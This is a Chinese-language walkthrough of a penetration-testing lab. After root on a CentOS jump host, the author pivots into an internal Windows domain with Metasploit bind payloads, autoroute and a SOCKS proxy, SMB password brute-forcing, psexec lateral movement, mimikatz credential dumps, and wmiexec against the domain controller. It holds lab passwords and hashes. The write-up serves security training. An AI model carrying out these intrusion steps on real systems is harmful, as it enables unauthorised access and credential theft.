(incomplete) eth1 192.168.93.17 (incomplete) eth1 192.168.93.63 (incomplete) eth1 192.168.93.147 (incomplete) eth1 192.168.93.140 (incomplete) eth1 192.168.93.243 (incomplete) eth1 192.168.93.47 (incomplete) eth1 192.168.93.65 (incomplete) eth1 192.168.93.182 (incomplete) eth1 192.168.93.23 (incomplete) eth1 192.168.93.222 (incomplete) eth1 192.168.93.167 (incomplete) eth1 192.168.93.116 (incomplete) eth1 192.168.93.156 (incomplete) eth1 192.168.93.28 (incomplete) eth1 192.168.93.83 (incomplete) eth1 192.168.93.134 (incomplete) eth1 192.168.93.146 (incomplete) eth1 192.168.93.190 (incomplete) eth1 192.168.93.163 (incomplete) eth1 192.168.93.122 (incomplete) eth1 192.168.93.252 (incomplete) eth1 192.168.93.148 (incomplete) eth1 192.168.93.30 ether 00:50:56:b1:b3:0d C eth1 192.168.93.227 (incomplete) eth1 192.168.93.233 (incomplete) eth1 192.168.93.136 (incomplete) eth1 192.168.93.12 (incomplete) eth1 192.168.93.43 (incomplete) eth1 192.168.93.164 (incomplete) eth1 192.168.93.14 (incomplete) eth1 192.168.93.242 (incomplete) eth1 192.168.93.200 (incomplete) eth1 192.168.93.168 (incomplete) eth1 192.168.93.181 (incomplete) eth1 192.168.93.213 (incomplete) eth1 192.168.93.160 (incomplete) eth1 192.168.93.102 (incomplete) eth1 192.168.93.5 (incomplete) eth1 192.168.93.206 (incomplete) eth1 192.168.93.231 (incomplete) eth1 192.168.93.3 (incomplete) eth1 192.168.93.34 (incomplete) eth1 192.168.93.127 (incomplete) eth1 192.168.93.226 (incomplete) eth1 192.168.93.115 (incomplete) eth1 192.168.93.158 (incomplete) eth1 192.168.93.161 (incomplete) eth1 192.168.93.46 (incomplete) eth1 192.168.93.20 ether 00:50:56:b1:ab:06 C eth1 192.168.93.59 (incomplete) eth1 192.168.93.236 (incomplete) eth1 192.168.93.155 (incomplete) eth1 192.168.93.207 (incomplete) eth1 192.168.93.173 (incomplete) eth1 192.168.93.126 (incomplete) eth1 192.168.93.153 (incomplete) eth1 192.168.93.2 (incomplete) eth1 192.168.93.114 (incomplete) eth1 192.168.93.192 (incomplete) eth1 192.168.93.51 (incomplete) eth1 192.168.93.123 (incomplete) eth1 192.168.93.225 (incomplete) eth1 192.168.93.135 (incomplete) eth1 192.168.93.48 (incomplete) eth1 192.168.93.179 (incomplete) eth1 192.168.93.21 (incomplete) eth1 192.168.93.78 (incomplete) eth1 192.168.93.249 (incomplete) eth1 192.168.93.193 (incomplete) eth1 192.168.93.246 (incomplete) eth1 [toor@localhost tmp]#
这个时候,我们要上线MSF就需要说,kali和这个ROOT机器要能够通信 之前其实也可以需要通信了,然后直接用kali里面自带的这个脏牛来打 然后把OPENVPN文件放入kali中,然后CD到桌面,用命令
但是我发现有问题,我在kali里面连接这个机器的时候,一开OPENVPN的话就会卡死我的服务,就是那台脏牛提权之后的机器就是连接不上了,那个页面就卡死了 断开重连吧1 2 3 4 ssh -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20 wwwuser_123Aqx su toor 123456
win上和kali上都可以用这个连接上我们的ROOT机器 主要是他们之间的通信问题,之前豆包告诉我的通信失败问题我有点不太信了 但是蚁剑webshell那台和ROOT那台确实可以通信 然后和我的WIN还有KALI的再试试 测试通信1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 # 测跳板机 → Windows 主机 ping -c 2 192.168.220.1 # 测跳板机 → Kali 虚拟机 ping -c 2 192.168.220.128 # 测跳板机 → VPN 客户端隧道地址 ping -c 2 10.8.0.6 然后还有就是WEBSHELL那台通信的 ping -c 2 192.168.93.120 [toor@localhost wwwuser]# ping -c 2 192.168.93.120 PING 192.168.93.120 (192.168.93.120) 56(84) bytes of data. 64 bytes from 192.168.93.120: icmp_seq=1 ttl=64 time=0.315 ms 64 bytes from 192.168.93.120: icmp_seq=2 ttl=64 time=0.283 ms --- 192.168.93.120 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 999ms rtt min/avg/max/mdev = 0.283/0.299/0.315/0.016 ms [toor@localhost wwwuser]#
就第四个是成功的 但是就是我们的KALI是可以找到这个SSH连接上的ROOT机器的1 2 3 4 5 6 7 8 9 10 11 12 13 14 ping 192.168.111.20 -c 3 ┌──(root㉿kali)-[~] └─# ping 192.168.111.20 -c 3 PING 192.168.111.20 (192.168.111.20) 56(84) bytes of data. 64 bytes from 192.168.111.20: icmp_seq=1 ttl=63 time=45.0 ms 64 bytes from 192.168.111.20: icmp_seq=2 ttl=63 time=48.3 ms 64 bytes from 192.168.111.20: icmp_seq=3 ttl=63 time=46.6 ms --- 192.168.111.20 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2004ms rtt min/avg/max/mdev = 45.043/46.633/48.284/1.323 ms ┌──(root㉿kali)-[~] └─# nc -znv.168.111.20 4444 (UNKNOWN) [192.168.111.20] 4444 (?) open
可以看到KALI是可以向SSH后ROOT的那台通信的
经过了不懈努力和GPT的帮助,还是上线MSF了
1 2 3 4 5 6 7 8 9 10 11 meterpreter > meterpreter > sysinfo Computer : localhost.localdomain OS : CentOS 6.5 (Linux 2.6.32-431.el6.x86_64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > getuid Server username: toor meterpreter >
后面就是后渗透的内容了
中间省了两步 第一步:建立KALI机器和SSH连接的ROOT机器之间的文件传输连接 第二步:MSF上线
MSF上线 生成目标本地监听的正向绑定载荷,监听端口可自定义(示例用 5555)
1 msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=5555 -f elf -o /tmp/meter_bind.elf
生成后的文件位于/tmp/meter_bind.elf 然后ROOT机器下载文件 下载好了后
1 2 3 chmod +x /tmp/meter_bind.elf setsid /tmp/meter_bind.elf >/dev/null 2>&1 & ss -tlnp | grep 5555
看到 0.0.0.0:5555 处于 LISTEN 状态,再回来操作 MSF 然后回到kali
1 2 3 4 set payload linux/x64/meterpreter/bind_tcp set RHOST 192.168.111.20 set LPORT 5555 run
建立文件传输服务 这里就是卡我卡的最久的一个地方 主要是这个我们的是用别人的靶机,所以kali和靶机之间不能直接通信 好像别人全是自己搭建靶机的话,就可以实现这个直接建立连接了,其他啥都不用管
在 Kali 登录 ROOT:
1 ssh -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20
输入 wwwuser 密码。登录后切换管理员:
输入 toor 密码。
传文件时,另开一个 Kali 本机终端 。
Kali → ROOT:
1 scp -O -o HostKeyAlgorithms=+ssh-rsa /本地文件路径 wwwuser@192.168.111.20:/tmp/
把 Kali 的文件上传到 ROOT 的 /tmp。
ROOT → Kali:
1 scp -O -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20:/远程文件路径 /本地保存目录/
把 ROOT 上 wwwuser 有权限读取的文件下载到 Kali。
基本说明:
中文路径替换成实际路径,含空格时加引号。
scp 提示密码时,输入 wwwuser 密码。
-O:大写字母 O,使用传统 SCP 协议。
-o HostKeyAlgorithms=+ssh-rsa:兼容目标的旧 SSH 主机密钥算法。
文件通过 SSH 的 22 端口 传输。
首先我们就是SSH拿到ROOT的过程,如果前面一切都清楚了的话是非常快的 然后KALI执行
1 2 3 4 5 6 7 8 msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=5555 -f elf -o /tmp/meter_bind.elf 回显 [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 78 bytes Final size of elf file: 198 bytes Saved as: /tmp/meter_bind.elf
然后把生成的文件传给ROOT机器
1 2 scp -O -o HostKeyAlgorithms=+ssh-rsa /tmp/meter_bind.elf wwwuser@192.168.111.20:/tmp/
ROOT机器执行
1 2 3 4 [toor@localhost wwwuser]# ls -l /tmp/meter_bind.elf -rw-r--r--. 1 wwwuser wwwuser 198 Oct 4 09:50 /tmp/meter_bind.elf [toor@localhost wwwuser]#
可以看到已经传过来了 然后ROOT机器给权限
1 2 chmod +x /tmp/meter_bind.elf
后台启动载荷,脱离终端运行
1 2 3 4 setsid /tmp/meter_bind.elf >/dev/null 2>&1 & 验证端口是否成功监听: ss -tlnp | grep 5555
然后MSF那边去连接 kali执行
1 2 3 4 5 6 7 8 msfconsole -q 调起MSF use exploit/multi/handler set payload linux/x64/meterpreter/bind_tcp set RHOST 192.168.111.20 set LPORT 5555 run
最后结果
1 2 3 4 5 6 7 8 9 10 LPORT => 5555 msf exploit(multi/handler) > run [*] Started bind TCP handler against 192.168.111.20:5555 [*] Sending stage (3090404 bytes) to 192.168.111.20 [*] Meterpreter session 1 opened (192.168.220.128:37177 -> 192.168.111.20:5555) at 2026-10-06 23:04:33 +0800 meterpreter > meterpreter >
可以看到一下就成功了 验证一下
1 2 3 4 meterpreter > getuid Server username: toor meterpreter >
一下问题都没有
内网信息搜集及以后部分 route查看一下。
1 2 3 4 5 6 7 8 9 10 11 12 13 meterpreter > route IPv4 network routes =================== Subnet Netmask Gateway Metric Interface ------ ------- ------- ------ --------- 192.168.93.0 255.255.255.0 0.0.0.0 0 eth1 192.168.111.0 255.255.255.0 0.0.0.0 0 eth0 No IPv6 routes were found. meterpreter >
确实是一个外网IP一个内网IP,接下来对内网IP所在网段进行探测
可以看到192.168.93.0/24:内部局域网,只有这台靶机能访问,你的 Kali 直接无法到达这个网段的任何机器 所以我们要把所有发给192.168.93.0/24 的流量都走这台跳板机
1 2 3 4 5 6 7 8 9 10 run autoroute -s 192.168.93.0/24 回显: meterpreter > run autoroute -s 192.168.93.0/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Adding a route to 192.168.93.0/255.255.255.0... [+] Added route to 192.168.93.0/255.255.255.0 via 192.168.111.20 [*] Use the -p option to list all active routes meterpreter >
添加路由成功 再执行
1 2 3 4 5 6 bg 回显: meterpreter > bg [*] Backgrounding session 1... msf exploit(multi/handler) >
,执行后会回到 msf6 exploit(multi/handler) > 的主控制台提示符,就说明会话已经后台运行了 然后启动SOCK5代理模块
1 2 3 4 5 6 7 8 9 10 11 12 13 14 use auxiliary/server/socks_proxy set srvport 6677 run 回显 [*] Backgrounding session 1... msf exploit(multi/handler) > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set srvport 6677 srvport => 6677 msf auxiliary(server/socks_proxy) > run [*] Auxiliary module running as background job 0. [*] Starting the SOCKS proxy server msf auxiliary(server/socks_proxy) >
这里可以看到代理成功 然后开始扫描主机
1 2 3 4 use auxiliary/scanner/discovery/udp_probe set rhosts 192.168.93.0-255 set threads 5 run
这个扫描会不会有点问题呀,就是可能会使得你这个连接断掉 又要重新上MSF 我扫完断了两次了 但是结果应该是一样的 不扫了
1 2 3 4 IP 地址 主机名 角色 / 开放服务 所属域 192.168.93.10 WIN-8GA56TNV3MV 域控 DC(DNS、NetBIOS) TEST 192.168.93.20 WIN2008 数据库服务器(MSSQL 1433/1434、NetBIOS) TEST 192.168.93.30 WIN7 域内工作站(NetBIOS) TEST
接下来扫描端口
1 2 3 use auxiliary/scanner/portscan/tcp set RHOSTS [主机IP] run
注意到都开启了445端口,所以尝试一下SMB爆破
大佬思路。但是我怕跟着扫就是会出现又挂了的情况,所以可能一些思路会有出入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 先试试较老的win2008: use auxiliary/scanner/smb/smb_login set RHOSTS 192.168.93.30 set pass_file /home/kali/桌面/pass.txt set SMBUser administrator run 爆破出密码为123qwe!ASD psexec横向移动getshell 域成员主机 有了密码直接psexec连接: use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind_tcp set SMBUser administrator set SMBPass 123qwe!ASD set RHOSTS 192.168.93.20 run 直接获得了system权限的shell 看看系统信息: 先 shell 再 systeminfo 回显 发现域为test.org 同理,用psexec尝试连接win 7。成功 已经控制了两台域成员主机了,现在试试同样的方法拿域控: 失败了 和红日2一样的思路,mimikatz启动 由于感觉上传mimikatz比较麻烦所以使用msf中的mimikatz,首先进入win2008的sessions,再开始使用: 加载kiwi模块 load kiwi 抓取一下密码: kiwi_cmd sekurlsa::logonPasswords 抓取到密码为:zxcASDqw123!! 再次尝试psexec横向移动: 失败,试试wmiexec,我的imapcket套件在windows上所以要再配一下代理 先用proxifier配置一下: 然后直接启动wmiexec: ./wmiexec_windows.exe administrator:zxcASDqw123!!@192.168.93.10 image-20240805165416488 直接getshell了,接下来找找靶场描述的重要文件: 成功拿到flag
然后回到我的打法 执行 SMB 密码爆破 执行之前,我们先得搞一下字典
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ┌──(root㉿kali)-[~] └─# wget -Op/pass.txt https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt --2026-10-07 00:11:13-- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 198.18.0.110 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|198.18.0.110|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 73026 (71K) [text/plain] Saving to: '/tmp/pass.txt' /tmp/pass.txt 100%[==========================>] 71.31K 204KB/s in 0.3s 2026-10-07 00:11:15 (204 KB/s) - '/tmp/pass.txt' saved [73026/73026] ┌──(root㉿kali)-[~] └─#
然后执行
1 2 3 4 5 6 use auxiliary/scanner/smb/smb_login set RHOSTS 192.168.93.30 set SMBUser administrator set pass_file /tmp/pass.txt run
这里扫的非常慢呀
1 2 3 4 5 6 7 8 9 10 msf auxiliary(scanner/smb/smb_login) > run [*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce [+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator [!] 192.168.93.30:445 - No active DB -- Credential data will not be saved! [*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.93.30:445 - Bruteforce completed, 1 credential was successful. [*] 192.168.93.30:445 - You can open an SMB session with these credentials and CreateSession set to true [*] Auxiliary module execution completed msf auxiliary(scanner/smb/smb_login) >
然后执行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 use exploit/windows/smb/psexec set RHOSTS 192.168.93.30 set SMBUser administrator set SMBPass 123qwe!ASD set payload windows/x64/meterpreter/bind_tcp run 回显 ession set to true [*] Auxiliary module execution completed msf auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp [*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST msf exploit(windows/smb/psexec) > set RHOSTS 192.168.93.30 RHOSTS => 192.168.93.30 msf exploit(windows/smb/psexec) > set SMBUser administrator SMBUser => administrator msf exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD SMBPass => 123qwe!ASD msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp payload => windows/x64/meterpreter/bind_tcp msf exploit(windows/smb/psexec) > run [*] 192.168.93.30:445 - Connecting to the server... [*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'... [*] 192.168.93.30:445 - Selecting PowerShell target [*] 192.168.93.30:445 - Executing the payload... [+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable... [*] Started bind TCP handler against 192.168.93.30:4444 [*] Sending stage (232006 bytes) to 192.168.93.30 [*] Meterpreter session 2 opened (Local Pipe -> Remote Pipe via session 1) at 2026-10-07 00:27:56 +0800 meterpreter > meterpreter >
然后验证身份
1 2 3 4 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
可以看到这里已经是另外一台机器了
1 2 3 4 5 meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31c1794c5aa8547c87a8bcd0324b8337::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter >
执行后会输出本地所有用户的 NTLM 哈希,其中就包含 administrator 的哈希值,后续可以直接用哈希传递(Pass-the-Hash)横向攻击内网其他机器,不用再爆破密码
bg一下回到MSF主控制台 然后执行 已经拿到 WIN7 本地管理员的 NTLM 哈希。接下来我们用这套凭据横向移动,直接拿下 192.168.93.20 WIN2008 数据库服务器
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 use exploit/windows/smb/psexec set RHOSTS 192.168.93.20 set SMBUser administrator set SMBPass 123qwe!ASD set payload windows/x64/meterpreter/bind_tcp run 回显 meterpreter > bg [*] Backgrounding session 2... msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec [*] Using configured payload windows/x64/meterpreter/bind_tcp [*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST msf exploit(windows/smb/psexec) > set RHOSTS 192.168.93.20 RHOSTS => 192.168.93.20 msf exploit(windows/smb/psexec) > set SMBUser administrator SMBUser => administrator msf exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD SMBPass => 123qwe!ASD msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp payload => windows/x64/meterpreter/bind_tcp msf exploit(windows/smb/psexec) > run [*] 192.168.93.20:445 - Connecting to the server... [*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'... [*] 192.168.93.20:445 - Selecting PowerShell target [*] 192.168.93.20:445 - Executing the payload... [+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable... [*] Started bind TCP handler against 192.168.93.20:4444 [*] Sending stage (232006 bytes) to 192.168.93.20 [*] Meterpreter session 3 opened (Local Pipe -> Remote Pipe via session 1) at 2026-10-07 00:31:30 +0800 meterpreter >
然后可以看到
1 2 3 4 5 6 7 8 9 10 11 12 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN2008 OS : Windows Server 2008 (6.0 Build 6003, Service Pack 2). Architecture : x64 System Language : en_US Domain : TEST Logged On Users : 2 Meterpreter : x64/windows meterpreter >
我们已经拿下2008这台机器了 拿下的前提是:很多企业内网(包括靶场环境)为了运维方便,会给所有 Windows 主机的本地 administrator 账号设置统一的相同密码 。 你在 Win7 工作站(192.168.93.30)上爆破得到的 administrator:123qwe!ASD,在 Win2008 数据库服务器(192.168.93.20)上同样有效 最后我们准备拿下最后一台DC域控
1 2 3 4 5 6 7 use exploit/windows/smb/psexec set RHOSTS 192.168.93.10 set SMBUser TEST\administrator set SMBPass 123qwe!ASD set payload windows/x64/meterpreter/bind_tcp run
这里用 TEST\administrator 显式指定域账号,避免本地账号解析问题;依旧用 bind_tcp 绑定型 payload,通过跳板机的内网路由主动连接域控
执行成功拿到 Meterpreter 后,我们就可以导出 NTDS.dit 域内所有用户的密码哈希 ,直接完成整个 TEST 域的权限控制 但是这里发现密码就不一样了
我们就需要换方法来打域控了 回到2008那个方法
加载 Mimikatz 模块(kiwi)
这里解释两个原因,为什么要用 kiwi,为什么要在 WIN2008 那台用 KIWI
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 kiwi 是 Metasploit 内置的 **Mimikatz 扩展模块**,核心目的是从目标系统内存中窃取缓存的账号凭据,选它的原因非常明确: 1. **无需上传文件,隐蔽干净** 直接在 Meterpreter 会话里加载扩展,全程内存操作,不用往目标机器上传 `mimikatz.exe` 实体文件,既避免触发杀毒软件,也不会留下文件操作痕迹,操作效率和隐蔽性都更高。 2. **刚好解决当前的核心问题** 我们现在卡在「本地管理员密码打不通域控」,说明域控的管理员账号是独立的域账号,密码和本地管理员不通用。而 kiwi 可以读取系统 LSASS 进程内存,输出所有缓存过的**本地账号、域账号的明文密码和 NTLM 哈希**,只要域管理员登录过这台机器,就能把他的密码抓出来,用来打域控。 3. **权限刚好匹配** 读取 LSASS 进程内存必须要 System 权限,我们已经拿到了这台机器的最高 System 权限,条件完全满足。 --- ### 二、为什么选 WIN2008 这台机器用 kiwi? 这是内网渗透抓取域管凭据的标准优先级选择,核心有 3 个原因: 1. **角色属性:域管理员登录概率高得多** WIN2008 是数据库服务器,属于内网核心业务服务器。域管理员日常运维(备份数据库、配置服务、故障排查)大概率会登录这台机器;而 WIN7 只是普通终端工作站,域管理员主动登录的概率很低。 只有被域管登录过的机器,内存里才会留下域管的登录凭据,所以优先从核心服务器抓取,效率最高。 2. **系统特性:默认缓存明文密码** Windows Server 2008(带 SP2)默认开启 **WDigest 认证**,用户登录后,LSASS 内存里会缓存**明文密码**,用 `creds_all` 或 `wdigest` 命令可以直接读出来;而 Win7 部分补丁版本默认禁用 WDigest,很多时候只能抓到 NTLM 哈希,不一定能拿到明文。 3. **权限已经就绪** 我们已经拿到了这台 WIN2008 的 System 权限,满足 kiwi 读取内存的权限要求,直接加载就能用,不用再做额外提权操作。 如果 WIN2008 里没抓到域管凭据,再退回到 WIN7 工作站上用同样方法尝试;两台都抓不到的话,再考虑 Kerberoasting、域内枚举等其他路径。优先抓核心服务器,是内网渗透拿域管的最高效路径
结果
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain LM NTLM SHA1 -------- ------ -- ---- ---- Administrator WIN2008 ae946ec6f4ca785b9337 31c1794c5aa8547c87a8 128c0272959b85b33009 1dee1d5ee7e6 bcd0324b8337 0611169d07d85cb6bd0b WIN2008$ TEST a2c62a457416624c0fdb be05606cc73a691b49b4 86659d5c7108 9e61c0f933996ed7649e wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) Administrator WIN2008 123qwe!ASD WIN2008$ TEST 39 03 a8 b7 ce 3e 93 b2 76 c8 09 99 16 f5 87 49 97 3e 4d 94 83 a d b7 b4 94 e7 33 f5 f4 8d aa c7 dc 87 9b f0 87 6d 5f e9 a9 08 c9 22 5e db 12 7a 00 9b 44 08 59 f8 e6 32 cc 0b 78 3a 50 9e 4d 3d 3a 3e b8 33 a0 69 54 b8 28 ee 22 87 56 52 63 e0 d8 3c 4b e3 72 a 4 c5 6f 98 f4 b6 d7 53 39 4b 66 54 7a fe 32 97 d2 29 91 2a 2c 78 8c 58 f7 70 b3 dc ce 03 da 4e 8b d7 2b ae 24 25 22 0e ca 36 c3 cd 9d 7e bd 99 ab b3 2d f5 aa 0d f9 c5 0c 34 e9 86 f8 3e fe 1c e 4 e1 c8 2d 68 ce 84 83 10 47 ce 55 72 bc fe fa 8e 24 c9 11 25 9b e7 5c cd 09 f7 52 3f 75 ea ed aa 0c 8e d6 d2 87 db fc 20 3a 08 7e de 0b 76 5e c6 6e 3c 89 06 61 20 fa 32 72 c3 a5 3a 2d 9c f9 7 9 53 83 3e aa 11 b5 3f 40 32 a9 aa 72 ef e5 13 ab bd 0e a6 41 74 67 d2 37 32 9d tspkg credentials ================= Username Domain Password -------- ------ -------- Administrator WIN2008 123qwe!ASD kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) Administrator WIN2008 123qwe!ASD win2008$ TEST.ORG 39 03 a8 b7 ce 3e 93 b2 76 c8 09 99 16 f5 87 49 97 3e 4d 94 83 ad b7 b4 94 e7 33 f5 f4 8d aa c7 dc 87 9b f0 87 6d 5f e9 a9 08 c9 22 5e db 12 7a 00 9b 44 08 59 f8 e6 32 cc 0b 78 3a 50 9e 4d 3d 3a 3e b8 33 a0 69 54 b8 28 ee 22 87 56 52 63 e0 d8 3c 4b e3 72 a4 c5 6f 98 f4 b6 d7 53 39 4b 66 54 7a fe 32 97 d2 29 91 2a 2c 78 8c 58 f7 70 b3 dc ce 03 da 4e 8b d7 2b ae 24 25 22 0e ca 36 c3 cd 9d 7e bd 99 ab b3 2d f5 aa 0d f9 c5 0c 34 e9 86 f8 3e fe 1c e4 e1 c8 2d 68 ce 84 83 10 47 ce 55 72 bc fe fa 8e 24 c9 11 25 9b e7 5c cd 09 f7 52 3f 75 ea ed aa 0c 8e d6 d2 87 db fc 20 3a 08 7e de 0b 76 5e c6 6e 3c 89 06 61 20 fa 32 72 c3 a5 3a 2d 9c f9 79 53 83 3e aa 11 b5 3f 40 32 a9 aa 72 ef e5 13 ab bd 0e a6 41 74 67 d2 37 32 9d meterpreter >
这里可以直接看到我们的这个结果,发现并没有我们要的
我们再回到2007那台(把前面的-i 3的3改为2) BG步骤也要的 然后执行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 load kiwi creds_all 回显: meterpreter > load kiwi Loading extension kiwi... .#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials =============== Username Domain NTLM SHA1 -------- ------ ---- ---- WIN7$ TEST bb6b48766fb280d74babb50e781bbc21 4ebd2d435d946f95f31d5c16351791fea97e 8f43 wdigest credentials =================== Username Domain Password -------- ------ -------- (null) (null) (null) WIN7$ TEST Xp:b4*hsKA*;!>;kdR2,_xtp?kPNozV.4<y:lcsCdtI73*n<M)&<GX0hY18?'FezvRL0SI OYg-9Q`K?2sh:w!lyL><H1&VNLKHYW0`emOz9geR4im!xBKodB kerberos credentials ==================== Username Domain Password -------- ------ -------- (null) (null) (null) win7$ test.org Xp:b4*hsKA*;!>;kdR2,_xtp?kPNozV.4<y:lcsCdtI73*n<M)&<GX0hY18?'FezvRL0 SIOYg-9Q`K?2sh:w!lyL><H1&VNLKHYW0`emOz9geR4im!xBKodB win7$ TEST.ORG Xp:b4*hsKA*;!>;kdR2,_xtp?kPNozV.4<y:lcsCdtI73*n<M)&<GX0hY18?'FezvRL0 SIOYg-9Q`K?2sh:w!lyL><H1&VNLKHYW0`emOz9geR4im!xBKodB meterpreter > meterpreter >
还是没有我们要的管理员的
我们又要换思路了 我试过打永恒之蓝呀,不行 那就可能又得回到其他大佬博客的方法了
打wmiexec 先看proxifier
然后回到MSF
1 2 3 4 5 6 7 8 先back然后变成msf > use auxiliary/server/socks_proxy set SRVHOST 0.0.0.0 set SRVPORT 6677 set SOCKS_VERSION 5 run
回显
1 2 3 4 5 6 msf auxiliary(server/socks_proxy) > run [*] Auxiliary module running as background job 0. [*] Starting the SOCKS proxy server msf auxiliary(server/socks_proxy) >
这里就是成功了 我们再回到proxifier看下
然后就开始用wmiexec 不同的版本命令也不一样 中间还有一步就是,如果你的是像我的这个PY的话,还有再搞一次代理规则 你把报错喂给AI是可以找出问题的 大概就是下面这样一个步骤
Proxifier → 配置 → 代理规则 → 添加
程序名称:填你的 Python 完整路径,比如 D:\python\python.exe
目标地址:填 192.168.93.10
动作:选择你配的 SOCKS5 代理
保存,把这条规则移到最上面1 python "D:\ctf\ctf-web\wmiexec\wmiexec-Pro-0.4.1\wmiexec-pro.py" administrator:zxcASDqw123!!@192.168.93.10 exec-command -shell
这里可以看到成功了
然后systeminfo试试
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 C:\Windows\system32>systeminfo [10/07/26 01:25:41] SUCCESS Results: exec_command.py:306 Host Name: WIN-8GA56TNV3MV OS Name: Microsoft Windows Server 2012 R2 Datacenter OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Primary Domain Controller OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00253-40020-11623-AA530 Original Install Date: 10/6/2019, 7:14:32 PM System Boot Time: 10/7/2026, 6:28:46 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2246 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020 Windows Directory: C:\Windows System Directory: C:\Windows\system32 